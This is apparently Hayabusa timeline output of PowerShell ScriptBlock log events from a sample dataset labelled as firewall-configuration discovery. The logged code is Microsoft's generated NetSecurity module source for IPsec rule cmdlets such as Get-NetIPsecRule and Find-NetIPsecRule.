Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.M",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"anagement.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false 
if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; 
ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, Value",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and 